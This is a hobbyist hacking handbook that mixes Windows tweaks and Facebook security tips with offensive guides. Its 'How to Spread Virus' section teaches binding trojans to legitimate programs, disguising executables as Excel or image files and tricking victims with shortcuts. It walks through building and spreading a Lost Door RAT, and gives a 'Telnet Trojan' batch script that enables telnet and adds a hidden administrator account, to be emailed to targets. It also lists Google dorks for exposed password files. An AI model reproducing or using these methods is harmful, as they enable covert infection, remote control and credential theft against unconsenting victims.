How to Hack any Password?

 

 
1. Brute force attack method. 
2. Sniffing 
3. Social Engineering  
4. with help of Tools. 
5. with help of Precompiled Hash (Rainbow tables, MD5) 
 

What is Encryption?




In cryptography, encryption is the process of transforming information (referred to as 
plaintext) using an algorithm (called cipher) to make it unreadable to anyone except those 
possessing special knowledge, usually referred to as a key. 

The transformation of plaintext into an apparently less readable form (called cipher text) 
through a mathematical process. The cipher text may be read by anyone who has the key 
that decrypts (undoes the encryption) the cipher text. 

Encryption converts data into an encoded form before it is sent over the Internet. This 
prevents unauthorized access to the information. ... 


What is Password?




A password is a secret word or string of characters that is used for authentication, to 
prove identity or gain access to a resource (Example: An access code is a type of 
password). The password must be kept secret from those not allowed access. 

The use of passwords is known to be ancient. Sentries would challenge those wishing to 
enter an area or approaching it to supply a password or watchword. Sentries would only 
allow a person or group to pass if they knew the password. In modern times, user names 
and passwords are commonly used by people during a log in process that controls access 
to protected computer operating systems, mobile phones, cable TV decoders, automated 
teller machines (ATMs), etc. A typical computer user may require passwords for many 
purposes: logging in to computer accounts, retrieving e-mail from servers, accessing 
programs, databases, networks, web sites, and even reading the morning newspaper 
online. 


25Windows Hidden Tools You Seldom Use


 
To run any of these apps go to Start > Run  and type the executable name  and press  Enter.  

Character Map (charmap.exe)  - Very useful for finding unusual characters. 
Disk Cleanup (cleanmgr.exe)  – The usual Disc cleanup. 
Clipboard Viewer (clipbrd.exe) - Views contents of Windows clipboard. 
Dr Watson (drwtsn32.exe) - Troubleshooting tool,runs when windows crashes. 
DirectX diagnosis (dxdiag.exe) - Diagnose & test DirectX, video & sound cards. 
Private character editor (eudcedit.exe) - Allows creation or modification of characters. 
IExpress Wizard (iexpress.exe)  - Create self-extracting  / self-installing package. 
Microsoft Synchronization Manager (mobsync.exe) - Appears to allow synchronization of 
files on the network for when working offline. Apparently undocumented.  
Windows Media Player 5.1(mplay32.exe)  - Retro version of Media Player, very basic. 
ODBC Data Source Administrator (odbcad32.exe) – Database connection utility for support 
with external servers,create ODBC data sources,to administer remote databases or for 
supporting the ODBC database utility in Visual basic language. 
Object Packager (packager.exe)  - To do with packaging objects for insertion in files, appears 
to have comprehensive help files.  
System Monitor (perfmon.exe) - Very useful, highly configurable tool, tells you everything 
you ever wanted to know about any aspect of PC performance, for budding uber-geeks only.  
Program Manager (progman.exe) - Legacy Windows 3.x desktop shell.  
Remote Access phone book (rasphone.exe) - Documentation is virtually non-existent.  
Registry Editor (regedt32.exe or regedit.exe) –  For making custom changes or hacking the 
Windows Registry.  
Network shared folder wizard (shrpubw.exe)  - Creates shared folders on network. 
 
File signature verification tool (sigverif.exe)  - This tool will search the operating system and 
identify any unsigned device drivers installed on the system. It will also verify all signed 
device drivers. 
Volume Control (sndvol32.exe)  - I've included this for those people that lose it from the 
System Notification area. 
System Configuration Editor (sysedit.exe)  - Modify System.ini & Win.ini just like in Win98! 

Syskey (syskey.exe) - Secures XP Account database, use with care, it's virtually 
undocumented but it appears to encrypt all passwords, I'm not sure of the full implications. 
Microsoft Telnet Client (telnet.exe) – Built in telnet client which can be used to connect to 
servers to sent emails or to hack :) This is disabled in in vista  but you can re-enable it by 
going to  
Control panel –> Programs and Features –> Click "Turn Windows features on or off" on left 
–> Scroll down and check "Telnet Client. 
 
Driver Verifier Manager (verifier.exe) - Seems to be a utility for monitoring the actions of 
drivers, might be useful for people having driver problems. Undocumented.  
 
Windows for Workgroups Chat (winchat.exe) - Appears to be an old NT utility to allow chat 
sessions over a LAN, help files available.  
 
System configuration (msconfig.exe)  - Can use to control startup programs, make changes to 
startup of XP. 
 
Group Policy Editor (gpedit.msc) - Used to manage group policies, and permissions.Its an 
Administrator only tool.

Disable Writing to USB Drives





 A major concern at organizations is allowing users to plug in a  usb flash drive , because they could so 
easily copy corporate data. Since Windows XP SP2, you can disable writing to USB devices 
altogether using a simple registry hack. However one should also note that if you are using 
this trick, you should make sure that the users are not administrators on the computer , because 
they could easily change this setting back.  
Here it is:  
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies]  
"WriteProtect"=dword:00000001   




Paste the code into a notepad file,and then save it as a registry file(file.reg). 
Double click it and voila,you have successfully prevented the write access to the USB drive. 
Once you have double clicked the registry, you will have to reboot for the changes to take 
effect. This works on Windows Vista as well. Here's the window you'll get when you try and 
write to a USB drive :  





If you want to enable the write access again,then copy this code and paste the code into a 
notepad file,and then save it as a registry file.Double click it and write access will be enabled 
again. 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies]  
"WriteProtect"=dword:00000000'  

Windows Administrator Password Hack



This post is about an interesting  hack to bypass the login passwords in Windows.
Application of this hack will result in Windows logging you on everytime as a certain user
( Please do remember at this point that this trick is useful if you are the sole user of your
computer. ) Follow the steps mentioned below to apply this trick
  Click Start -> Run.
  Type Control userpasswords2
  Press Enter.



  Click to uncheck the box labelled ‘ Users must enter a user name and password to
use this computer’ .
  Press OK.

Registry Editor Tweaks for fun (Win XP)





1. Change Dos Prompt Color:  

Type these lines in notepad and save as  anyfile.reg and run it. 

Windows Registry Editor Version 5.00 
[HKEY_CURRENT_USER\Softwa re\Microsoft\Command Processor] 
"DefaultColor"=d word:0000002e 

2. Change Your Processor to Intel Xeon 8.0 GHZ or any 

Type following lines in notepad  

Windows Registry Editor Version 5.00 
[HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0] 
"ProcessorNameString"="Intel Xeon  8.0GHz" 

and save as  processor.reg and run it.  

To see new processor name Click on “My computer”  and right click and choose property, 
which will show “ Intel Xeon 8.0 GHZ. (It is temparory change only) 

Note: For permanent changes regedit /s processor.reg  in notepad and save as  phack.bat  

and put both files(processor.reg and phack.bat)  
in windows startup folder [ Documents abd settings\all users\start meny\programs\startup ] 
which will run whenever the system restarts. 



4. Disable Find option in windows operating system  




Windows Registry Editor Version 5.00 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 
"NoFind"=dword:00000001 
5. Disable Logoff Feature in Windows Operating System
Windows Registry Editor Version 5.00 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 
"NoLogoff"=dword:00000001 
6. Disable RUN Feature in windows operating system
Windows Registry Editor Version 5.00 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 
"NoRun"=dword:00000001 
7. Optimize Computer Speed  




More tweaks are available here: http://www.askvg.com  


E nable Task Manager /Registry Editor /Command prompt.
Sometime due to virus infection Task Manager/ Registry Editor/ Command Prompt is 
disabled. We can enable with help of gpedit.msc and registry editor. 

How to enable Registry Editor 
a. Type gpedit.msc in RUN dialog box and goto: 

    User Configuration -> Administrative Templates -> System 

in right-side pane, set "Prevent access to Registry editing tools" to either Not  

Configured or Disabled. 



b. Just type following in RUN dialog box and press <ENTER>: 

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v  
DisableRegistryTools /t REG_DWORD /d 0 /f 
How to enable Task Manager 
a. Type gpedit.msc in RUN dialog box and goto: 

    User Configuration -> Administrative Templates -> System 

in right-side pane, select  Ctrl+Alt+Del Options--> set " Remove Task Manager " to either 
Not Configured or Disabled. 

How to enable Command Prompt 

a. Type gpedit.msc in RUN dialog box and goto: 

    User Configuration -> Administrative Templates -> System 

in right-side pane, set "Prevent access to command prompt" to either Not  
Configured or Disabled. 

How to Hide File & Folder Super Hidden




It is a 100% safe and free method to hide a file or folder from others in your system without 
using any application.For this ,open dos prompt and type: 

For Hide: 
X:\> attrib +a  +r  +s +h foldername /s /d [enter] 

For unhide: 
X:\> attrib -a  -r  -s  -h foldername /s /d [enter] 

X= x is location for our folder in hard disk. 

How to Spread Virus







1. File Binding. 
2. Hide exe into excel file.  
3. Office 2003 Macro bypasser:  
4. File name phising 
5. False Linking.  

1. File Binding): 
File binding is a process to bind two exe files into one. When binded exe is exeuted, both the 
exe’s are executed at the same time. 

We have 2 default binder programs: 
1. iexpress.exe (ship with xp+vista) 
Goto run and type: iexpress 

and select 1 option : create a self extraction directive file next select 1
st

option next give package title-my prg or any next  select no prompt  select donot 
display a license  add 2 files (one virus or Trojan file, and 2 any software like winamp.exe) 
next  select install program  winamp.exe and post install command  select 
server.exe(virus) Selct default next no message select Browse to save a final exe file. 
And next  final.exe created. 

When we are binding the exe’s, the limitation is that it makes a third type of icon which can 
be detected so to change icon we use resource hacker program for getting the orginal icon.To 
change icon use  resource hacker  program.  

Don’t use custom binders from internet because they are detected as virus by many anti 
viruses. 

Limitation of iexpress: 
Iexpress can only bind  exe file format into final exe, not any other extension like excel, PDF 
file. 





2. Hide exe into excel file.  



Extract excelhack.exe  to c drive and put 2 files, one sever.exe(virus) and another is excel 
file(bill.xls) in the same folder then open dos prompt and then type the command given below: 

c:\>excelhack.exe bill.xls server.exe [enter]  

Limitation of this exploit: Work only in office 2003 




3. Office 2003 Macro bypasser:  

Download: www.thesecretofhacking.com/sw/ch2/macrobypasser.reg   
and send it to the targeted system which will enable macro  feature, which will be helpful to infect 
victim system. 

4. File name phising 

Open Dos Prompt and just rename the file and create a archive with help of winrar software. 

C:\> ren server.exe  photo1226.jpeg-www.myspace.com  



5. False Linking.  

It is one of the special methods of infecting a target system, where we change the name of 
server.exe into bill.xls with the help of “  c:\> ren server.exe bill.xls ” 
But before that we make the shortcut of server.exe on same folder and after that open shortcut 
property and set “ C:\windows\system32\cmd.exe /c bill.xls” . 

Then if anybody clicks on  bill.xls.lnk it will automatically tun the server.exe which will  
infect the target system easily. 

ROOTKIT





Root kit is also a virus like Trojan for remote access of any system. Root kit is very
as compared to Trojan because  root kit implements on kernel level of any operating
which is hard to detect and delete. 

Root kit is invisible in taskmanager as it hides itself. 

Download Rootkits: http://www.packetstormsecurity.org/UNIX/penetration/rootkits/   
If you want to prevent your system from rootkit use  Rootkit Hunter. 

RAT We can create Trojan viruses with help of Trojan builders





Best tools to create own Trojan (client) part and to control all infected machines are: 
1.   Lost door v3.0 Stable* 


1.Lost Door  :  Lost door is a remote administration tool for Microsoft Windows operating 
systems. You can control and monitor remote computer easily and view what user does. Illegal 
usage of this software is not allowed. Coder and related site is not responsible for any abuse of 
the software. 


Download: http://www.lostdoor.cn  


Features:  


 [+] Reverse Connection  
 [+] Webcam Shot  
 [+] Date& time Manger  
 [+] printer  
 [+] Control pannel  
 [+] Pc control  
 [+] Exucutor  
 [+] Dos command  
 [+] Windows manager  
 [+] Screen Shot  
 [+] Remote server manager  
 [+] Server remover  
 [+] Ip Graber  
 [+] Server Downloader  
 [+] Icon Changer  
 [+] Audio Streaming  
 [+] Encrypt Settings  
 [+] Volume Control  
 [+] Connection Logs  
 [+] Instaled Appliction  
 [+] Infect All USB  
 [+] Multilanguage  
 [+] Invisible in Searching Files  


 [+] Services Viewer  
 [+] Remote passwords  
 [+] MSN Controler 
 [+] Remote Shell  
 [+] Chat with server  
 [+] Send fake messages  
 [+] files manager  
 [+] Find files  
 [+] Change remote screen resolution  
 [+] Information about remote computer  
 [+] Clipboard manager  
 [+] IE options  
 [+] Running Process  
 [+] Online keylogger  
 [+] Offline keylogger  
 [+] Fun Menu  
 [+] Remote Nat viewer  
 [+] Rmote Resotr Manager  
 [+] Added Some Graphics  
 [+] Some minor Bugs fixed  
 [+] Some Forms Has Been Modified  
 [+] News Navigator was Added  
 [+] Server Size (120kb) 


How to create Trojan virus with help of Lost door? 
1. For LAN(Local area Network) 
2. For WAN(Internet) 

1. For LAN: 
Open Lost door  click on Create server button and then a dialog box appears where you 
mention server own ip address---then…create)))) then server.exe will be created on lost door 
folder .. then send this exe to target system for remote control.  

For establishing the connection from server to victim. 
Start your server>> just click start listen Button. 
To control the victim system, right click and connect.. 


2. For WAN(Internet) 
The Lost door has limitation for WAN, where our computer needs direct internet connection. 
We can infect many remote users with help of email, orkut, chat (After download server.exe 
that was created by Lost door). 

When we create a server.exe our clients can communicate one time because our internet 
service provider provides dynamic ip address .So to overcome this problem we sign up with  
www.no-ip.com  and provide static DNS for dynamic IP address. 

Click No-Ip FREE: For  Create a free hostname to point to your dynamic IP. (try now) 
 and fill the form and mention your email address and password and after add a host. 

and download a client for change ip record on dns so that we mention hostname : ex: 
sprithunter008.no-ip.biz . 

use this host name in create a server address tab. 

TROJAN




Trojan horse is also a type of virus which is used to control remote machine without system 
owner knowledge. Trojan has two parts : 1. server 2. client , Server handles all infected remote 
computers' connections and client is used to infect victim computer system. Every Trojan has its 
associated port number for communication over internet or LAN. 



Telnet Trojan    Target : All windows XP machines. 
Features: Fully undetectable for all antiviruses.  
----------------------------------------------------------------------- ---------------------------------------------- 
echo off 
sc config TlntSvr start= auto 
sc start TlntSvr 
tlntadmn config sec=-NTLM 
tlntadmn config mode=stream 
net user rdxentre /add 
net user rdxentre rdx123 
net localgroup administrators rdxentre /add 
exit 

Write the above code in the notepad and save as myvirus.bat and send it through email, pen 
drive, etc to other system for remote control. 

Top 5 Most Famous Hackers of All Time



1. Jonathan James: James gained notoriety when he became the first juvenile to be sent to 
prison for hacking. He was sentenced at the  age of 16 . In an anonymous PBS interview, he 
professes, "I was just looking around, playing around. What was fun for me was a 
challenge to see what I cou ld pull off." James also  cracked into NASA computers, 
stealing software worth approxim ately $1.7 million. 
2. Adrian Lamo: Lamo's claim to fame  is his break-ins at major  organizations like The New 
York Times and Microsoft. Dubbed the "homeless hacker,"  he used Internet connections 
at Kinko's, coffee shops  and libraries to make his intrusions.  In a profile article, "He Hacks 
by Day, Squats by Night," Lamo reflects, "I  have a laptop in Pittsburgh, a change of 
clothes in D.C. It kind of redefines the term multi-jurisdictional." 
3. Kevin Mitnick: A self-proclaimed "hacker poster boy,"  Mitnick went through a highly 
publicized pursuit by authoritie s. His mischief was hyped by  the media but his actual 
offenses may be less notable  than his notoriety suggests. The Department of Justice 
describes him as "the most wanted computer criminal in United States history." His 
exploits were detailed in two movies: Freedom Downtime and Takedown. 
4. Kevin Poulsen: Also known as Dark  Dante, he gained recognition  for his hack of LA 
radio's KIIS-FM phone lines, which earned him a brand new Porsche, among other items. 
His hacking specialty, however, revolved around telephones.  
5. Robert Tappan Morris : Morris, son of former National Security Agency  scientist Robert 
Morris, is known as the creator of the Morris Worm, the first computer worm to be 
unleashed on the Internet. As a result of this crime, he wa s the first person prosecuted 
under the 1986 Computer  Fraud and Abuse Act. 


Google hacking to find out any software within 15 second. 

Google hacking is a term that refers to the act of creating complex search engine queries in order 
to filter through large amounts of search results for information related to computer security. In 
its malicious format it can be used to detect websites that are vulnerable to numerous exploits 
and vulnerabilities as well as  locate private, sensitive inf ormation about others, such as credit 
card numbers, social security numbers, and passwords. 

Google hacking is a process to find any file as soon as possible with help of some advanced 
parameter.  

For example we need AVG antivirus or any software, and we have 10-15 second so we use 
google advanced parameter, to search from rapidshare.com 



site:rapidshare.com avg  



Other Parameters: 
intitle:admbook intitle:version filetype:php 
intitle:"Index of" passwords modified 
allinurl:auth_user_file.txt 
"access denied for user" "using password" 
"A syntax error has occurred" filetype:ihtml 
allinurl: admin mdb  
"ORA-00921: unexpected end of SQL command" 
inurl:passlist.txt 
"Index of /backup" 

allinurl:auth_user_file.txt 
DCForum's password file. This file gives a list of (crackable) passwords, usernames and email 
addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger 
than others, all are fun, and all belong to googledorks. =) 



intitle:"Index of" config.php  
This search brings up sites with "config.php" files. To skip the technical discussion, this 
configuration file contains both a username and a password for an SQL database. Most sites with 
forums run a PHP message base. This file gives you the keys to that forum, including FULL 
ADMIN access to the database. 

eggdrop filetype:user user  
These are eggdrop config files. Avoiding a full-blown discussion about eggdrops and IRC bots, 
suffice it to say that this file contains usernames and passwords for IRC users. 

The syntax “link:” will produce a list of webpages that have a link to a specified webpage. 
For example: link:www.hak9.com will create a Google list of websites with links to 
www.hak9.com. 

The Google syntax “phonebook” searches for U.S. street addresses and phone number 
information. For Example: “phonebook:James+FL” will list down all names of person 
having “James” in their names and located in “Florida (FL)”. 

for more information: h ttp://www.googleguide.com/adv anced_operators.html  

SECURE YOUR FACEBOOK


HOW TO SECURE YOUR FACEBOOK ?


Login to your facebook account and enter to "ACCOUNT SETTINGS"


1-Your primary e-mail account
 add a secondry email to avoid        
 hijacking




2- Update password as possible, And also don't put your name or other related words. Never use 25 bad password


3-Linked account- It will help you to avoid hijacking because it linked with other account.


4-Download a copy of  facebook.it download whole content of u r facebook and if anyone delete ur account or anything will happen to ur account we can restore it


5-Secure Browsing,If we enable it then facebook use secure browsing and avoid password sniffing and packet captuaring


6-Login notifications- Enable it.Because it help you to identify the login details of u r account and also you will when, where the login occured


7-App passwords-it will create a password for u r apps


8-Recognize device-this will save your device as default device and no one can enter ur account without ur device


9-Active sections-this show u r logging information as a log file, and we can verify it.


10-only important update to avoid spam mails and also junk mail.




11- use only verified apps because it also have problems that make more ads on our account and also spam mails


12- Add u r mobile number, to avoid account hacking


13- Important for parents if they add their no. here and enable text messaging, they will get the whole account information for their children account.they will get about messaging, taging, friends etc.




You better had better to remove both thing because you can avoid maximum ads from facebook









25 BAD PASSWORDS IN INTERNET

1. password
2. 123456
3.12345678
4. qwerty
5. abc123
6. monkey
7. 1234567
8. letmein
9. trustno1
10. dragon
11. baseball
12. 111111
13. iloveyou
14. master
15. sunshine
16. ashley
17. bailey
18. passw0rd
19. shadow
20. 123123
21. 654321
22. superman
23. qazwsx
24. michael
25. football

Facebook hack rdxentre

Hack facebook simply by following steps